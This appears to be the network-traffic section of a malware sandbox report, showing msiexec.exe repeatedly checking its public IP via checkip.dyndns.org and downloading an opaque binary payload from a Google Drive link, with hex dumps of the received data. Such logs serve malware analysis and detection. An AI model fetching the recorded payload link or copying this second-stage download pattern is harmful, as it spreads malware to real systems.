Dec 17, 2024 13:21:45.348414898 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:21:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ef3114677c32626054a301632f7d34b2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 17, 2024 13:21:45.353056908 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 13:21:45.674164057 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:21:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6c0e37977be04faadcbfb45495a3a6e9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 17, 2024 13:21:48.173476934 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 13:21:48.494707108 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:21:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a294b3a305a32b7faa245fcaea2e896e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49794	193.122.130.0	80	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:21:50.282883883 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 13:21:51.379437923 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:21:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 97b046c7939595fefd602166125bcb34 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49802	193.122.130.0	80	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:21:53.430732965 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 13:21:54.528269053 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:21:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 51a9d6546f484b5b648709818291a74e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 17, 2024 13:21:55.008661985 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:21:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 51a9d6546f484b5b648709818291a74e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49813	193.122.130.0	80	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:21:56.673068047 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 13:21:57.788716078 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:21:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e8dd655e44bb6f4f750e49969f5defaf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49821	193.122.130.0	80	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:21:59.577003956 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 13:22:00.673755884 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:22:00 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9c941f707c9d7fd31fac18cc2b0bb0d8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49828	193.122.130.0	80	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:22:02.464032888 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 13:22:03.560493946 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:22:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0a699b500330406508dcdc89410088a3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49835	193.122.130.0	80	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:22:05.352478027 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 13:22:06.465234995 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:22:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b98d5e3997d628b261f3c342863c6097 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49847	193.122.130.0	80	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:22:08.299333096 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 13:22:09.395684958 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:22:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c33ba37b116d4014ac18053f82323c9b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49752	172.217.19.174	443	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:21:36 UTC	216	OUT	GET /uc?export=download&id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-12-17 12:21:36 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 17 Dec 2024 12:21:36 GMT Location: https://drive.usercontent.google.com/download?id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-tRfoyVIMPXWoTmIoDrxlTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49763	142.250.181.97	443	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:21:38 UTC	258	OUT	GET /download?id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-17 12:21:41 UTC	4938	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC6BQmDeTQZWRVvWvh8i3fS3q4KAoZ8dlczu89EsNzd_dBk7Bj8yKrzhpNVljg4XhBYc Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="IOOuEfGFVtqqMr144.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 275520 Last-Modified: Wed, 27 Nov 2024 10:35:43 GMT Date: Tue, 17 Dec 2024 12:21:41 GMT Expires: Tue, 17 Dec 2024 12:21:41 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=x9zC1Q== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 12:21:41 UTC	4938	IN	Data Raw: 03 41 1b e2 78 0c 98 66 ca 59 19 f0 81 07 a9 41 af bc b7 1b 83 c4 4b 70 10 f7 6f 31 60 1d e5 a0 85 5e 39 be 90 03 d9 d4 c7 b0 35 08 40 02 8b 07 8f 4b e6 49 72 15 f1 67 79 85 10 cc 2b 1e 0d 46 46 a3 33 5d df af 3f 92 82 19 d7 c7 3e 22 de 1c c8 1f 92 ef 77 4e f2 b3 4f b8 22 89 05 0f d3 93 6e 2e 51 38 bf ba d0 7a b1 b5 9d 15 52 55 fb 7d 33 47 b4 69 ac 28 6a 15 84 c1 f1 cc e1 cb bd 58 38 6f a5 a7 65 ac d2 bb 0e a4 58 f1 1d 18 2f 5b fc 21 e5 88 32 dc 53 54 0f 61 14 20 5a ac 3f d4 17 42 2e 4f c4 03 88 2d d5 17 05 bd 17 00 df a6 34 1e db 23 07 82 f7 57 84 29 27 e4 de e0 55 8b 27 0e ef 28 ef bd fb f8 f7 2e 12 41 19 bc d0 30 35 50 96 9b 11 08 3d 31 50 6a 05 1e 5d 31 73 e7 91 e4 90 40 fa 09 72 ce f9 de 3a 5e ba b9 3a 04 d0 ae 20 95 28 38 69 46 64 f8 81 02 a6 99 0b Data Ascii: AxfYAKpo1`^95@KIrgy+FF3]?>"wNO"n.Q8zRU}3Gi(jX8oeX/[!2STa Z?B.O-4#W)'U'(.A05P=1Pj]1s@r:^: (8iFd
2024-12-17 12:21:41 UTC	4823	IN	Data Raw: 4e 9c 86 47 64 89 b6 d6 58 1e a4 9b e4 93 11 4c 44 ef c7 bc 43 62 12 6a 7c 61 45 36 00 a0 39 97 0a 46 9b dc 3d 97 10 81 74 b3 63 42 43 13 d8 18 4e a4 74 14 23 16 d0 04 01 a3 40 b2 b3 7c cd 1a d2 e8 45 ac b9 51 b6 b5 fc e2 91 15 ce f4 18 c1 de a6 10 61 90 cb 26 7d 75 be 49 6b 09 29 3d f9 1b 33 84 24 b5 cb df e0 ec c6 ba 57 cf 72 63 e2 5c 74 86 26 13 ca 70 c2 ae c7 f6 d3 a1 27 ce be e3 2d f0 45 64 a1 de 38 02 8b cc ad a8 45 c8 c4 8b cf d7 d0 06 4c 05 0e 9f 2a a3 b6 8d d4 de f0 41 34 d3 fd db 5c 19 3b c3 57 ab 7c 9a 8c 23 b4 76 d7 d4 ed da 60 86 16 85 91 52 96 90 e5 59 02 65 71 3f 9f f4 64 c2 67 94 28 bc 21 6a 4a 91 03 6a 70 69 6d 13 69 b1 4a a2 86 2b 5c 46 45 e4 31 7f 84 6d 7a 04 78 7f 82 0a 4e 8e 26 19 46 e9 ba 01 5e 6e b2 e7 cc d9 7f bf 5e d6 de 9b f2 99 Data Ascii: NGdXLDCbj\|aE69F=tcBCNt#@\|EQa&}uIk)=3$Wrc\t&p'-Ed8EL*A4\;W\|#v`RYeq?dg(!jJjpimiJ+\FE1mzxN&F^n^
2024-12-17 12:21:41 UTC	1322	IN	Data Raw: 3f 52 2c 5b ef 5e a6 47 bd 2b 79 45 91 f7 19 74 06 0a ce 37 bd 47 7c 88 2b 4d 3d 5b ec 20 7e 99 3b 78 04 02 69 76 55 40 8e 3d 0b 94 e0 b8 03 20 69 8b 24 c4 d9 a3 c8 59 b8 de 9f 8a a2 bf 96 0d e2 1e cd 55 0b 49 0c 70 76 dd de 7f b9 de 61 ea b9 6c cd 78 3a ff 26 06 14 15 de 25 42 3e cb d3 43 87 39 ad 31 15 0d 54 a2 14 db b9 27 a1 52 93 b0 41 a8 39 9d f4 7f 1d 8b b2 49 88 f2 f1 64 3d df e7 96 4b 6d 97 59 aa c7 ee 72 29 d9 3c 1c e9 41 88 a7 a0 8b d6 b3 1b 59 e4 db 2e 94 c1 c7 a8 5f 59 66 c8 dc 8d f5 a7 34 48 4e 61 f1 7e f0 76 5b 06 53 0b 91 a4 84 b1 3b c8 d3 a0 8a 20 71 16 7d 5c 16 f4 16 8c 55 66 7b 54 f2 45 53 17 3f 03 db 85 b1 90 b4 c2 58 0b 00 c3 be 36 2e b9 a7 72 a9 5a 57 92 cf 11 88 67 5b 5b 6b 98 64 69 de 02 e6 4a 3f ac 73 78 a4 6f 15 18 ac e7 d8 34 31 Data Ascii: ?R,[^G+yEt7G\|+M=[ ~;xivU@= i$YUIpvalx:&%B>C91T'RA9Id=KmYr)<AY._Yf4HNa~v[S; q}\Uf{TES?X6.rZWg[[kdiJ?sxo41
2024-12-17 12:21:41 UTC	1390	IN	Data Raw: d6 61 12 fa 39 5e 2f 16 ef 19 46 93 5d cb ce 55 33 e5 fb 37 c1 d4 59 9c a5 b4 90 90 9c 8c cf 41 91 85 14 57 1e d6 39 c1 8a 35 74 44 ef f4 1f 66 78 f1 d9 73 61 3b 94 25 bb 47 bd 0a 46 9d 7e 18 8b cf 40 7b b3 08 e0 6b 66 10 19 44 cb 26 14 23 1c c3 25 1a 2e 00 b2 b3 7d e9 0c a0 1c 80 ad c9 f3 4b a3 d4 56 81 15 c4 56 78 d9 ac 29 04 51 e3 69 b2 64 0b 86 5a 6b 0d 9a 18 e3 41 6b 87 24 cf 62 f0 bd b6 c6 b0 4e ee 0b 17 94 5c 7e e3 42 33 ca 76 c2 a9 f0 91 5e fe 2d ce bf f2 77 f0 45 6a b0 f8 4d 4f fe cc dd dc 5d a7 a3 8f e7 94 bf 6e 46 14 26 ed 6a d0 df 89 fc ea e3 45 32 c2 27 c3 6e 42 65 c3 57 ab 7c bc 8c 1a d3 05 bc de 33 d0 73 80 07 fd a4 3d fa 94 97 04 00 bb 0f 29 a6 73 48 ca 7c 84 b9 bc 32 4e 51 b5 f3 27 69 8b 40 13 69 ba 62 6a fa 5f 42 43 19 4e 05 6d c3 d8 7a Data Ascii: a9^/F]U37YAW95tDfxsa;%GF~@{kfD&#%.}KVVx)QidZkAk$bN\~B3v^-wEjMO]nF&jE2'nBeW\|3s=)sH\|2NQ'i@ibj_BCNmz
2024-12-17 12:21:41 UTC	1390	IN	Data Raw: fe 10 a9 15 ba fe 6f 51 24 59 bd d4 9b 5e 29 e7 ac d5 f8 30 11 1c 53 6e 0c 3e 2c f3 c2 51 b1 63 1c 67 2a e4 75 8e ae f5 7e 61 8e 54 5e 8a e9 88 71 bf 4c 38 88 95 8e a0 29 2d e4 a0 dc 55 8b 73 38 26 28 a3 b6 eb f0 50 9a 82 27 1d ce 87 32 35 20 80 b3 70 08 3f 3a 4d 95 54 0d 54 3e 7e cb 9d e1 98 57 95 c3 72 ce 0d e5 3e 75 b1 99 2b 0c c6 81 ee 95 28 32 29 46 75 d0 ff 3c a6 9b 0f b0 7f 2a 41 c8 20 7b 42 0e c3 50 9e 7e ee 33 fe 9a 3e b3 3d d5 c9 a0 18 fe 99 dc 12 0e df fa 11 0e 2f 07 ed 15 cd bc 93 cb cf 7a 25 86 89 57 0e a4 fb b3 b2 b4 40 90 9c 80 6d ba 99 d2 b2 6c 1e a6 91 f7 99 4b 64 26 ef f0 b7 9d 62 83 6b 7c 1f 7e 36 00 a4 4b c0 08 46 e9 ca 15 16 bd 80 7e a5 86 43 50 18 01 12 77 6f 7b 14 23 68 fb 04 01 a7 68 59 b3 7c c6 09 de 96 a4 ad b9 55 1c 86 ed e2 f1 Data Ascii: oQ$Y^)0Sn>,Qcgu~aT^qL8)-Us8&(P'25 p?:MTT>~Wr>u+(2)Fu<A {BP~3>=/z%W@mlKd&bk\|~6KF~CPwo{#hhY\|U
2024-12-17 12:21:41 UTC	1390	IN	Data Raw: 4d e9 6e 88 8f a4 04 6c e7 93 23 e5 ba 78 71 e6 24 fa d4 2a 9b 4c 1f a8 39 e1 3d bc 28 77 1c 72 f5 8b 6b 14 6b 4f eb 46 70 e0 0f 18 75 ea b7 4f 0b 16 8f c3 95 26 43 c4 fa 44 b2 39 5d a0 00 e7 6d 99 6d 13 60 c2 66 cd 77 64 43 b5 73 59 9a 72 e2 d8 13 b7 49 c8 46 6a 0a dc b5 23 98 af 3f 96 ae 1d d7 c7 c7 b2 67 1c 70 15 e0 c7 62 4e 82 9b 54 b8 22 83 7b 44 d3 93 6a 06 1b 38 bf b0 ae 65 b1 b5 99 3d 18 55 fb 77 91 53 a0 7d 84 92 6a 15 8e b5 72 cc 61 ca b1 58 3e 02 8f b9 65 68 b4 cd 2f 1c 53 bd d8 47 39 33 95 56 bb bb 40 b3 30 55 d2 0c 34 49 54 7f 51 bb 69 62 64 70 e4 71 f7 5e 78 3e 6b 9d 52 6a 9a f4 45 64 bf 36 8b aa ed 75 14 29 27 ee 7c c5 4d f9 f9 44 ef 58 01 99 e1 86 16 ab 82 23 bb 99 ca 42 87 5f 96 eb 53 2d 24 4e 47 6b 55 1a 32 c1 77 e7 9b 52 b5 5c 88 41 66 Data Ascii: Mnl#xq$*L9=(wrkkOFpuO&CD9]mm`fwdCsYrIFj#?gpbNT"{Dj8e=UwS}jraX>eh/SG93V@0U4ITQibdpq^x>kRjEd6u)'\|MDX#B_S-$NGkU2wR\Af
2024-12-17 12:21:41 UTC	1390	IN	Data Raw: f7 0f a2 26 55 11 d5 40 81 85 30 46 63 13 53 18 2a cc d6 21 c2 d9 21 37 91 94 c5 52 e8 d0 de 17 6d 39 e3 49 41 b6 1a 5e c8 3b 4d a3 b2 d9 84 b9 73 d1 08 1b 22 b8 83 84 38 90 02 5e 11 5a 8d 11 af cc 31 03 b6 21 aa bc b1 44 ff 6a 56 b2 48 a1 e8 70 80 a3 78 b6 15 64 14 02 d9 eb e7 f4 3d 07 e7 bf 0f 6a 37 bc 0c 1a da 46 e9 a8 e7 18 cb 17 e5 b6 ed 46 30 a4 1e 99 76 c1 6a ea 1d 5d 61 9e ba 5c ae d2 d5 d5 ca 20 2b 3e 9a b4 c2 ef 58 58 24 71 f9 2d 76 7c da 89 50 54 05 dd 88 8f 8e a6 49 ec e1 29 eb ba 08 d7 a1 bf fa d4 2a 4b 3e 6b a8 49 fd 06 23 5a ad 03 64 7b f6 7e 12 52 e9 c4 0f 70 9e 36 6a bd fc c5 68 21 54 ff d5 bb b6 5d d5 e4 7a 08 38 56 a1 39 1e ed 98 6d 07 95 bf 52 cd 76 46 7d aa 73 7b 8a 20 f2 d2 bd a0 c4 cb 46 6a 75 cd a3 5d d8 dd 68 90 86 69 c1 ef 40 dd Data Ascii: &U@0FcS!!7Rm9IA^;Ms"8^Z1!DjVHpxd=j7FF0vj]a\ +>XX$q-v\|PTI)K>kI#Zd{~Rp6jh!T]z8V9mRvF}s{ Fju]hi@
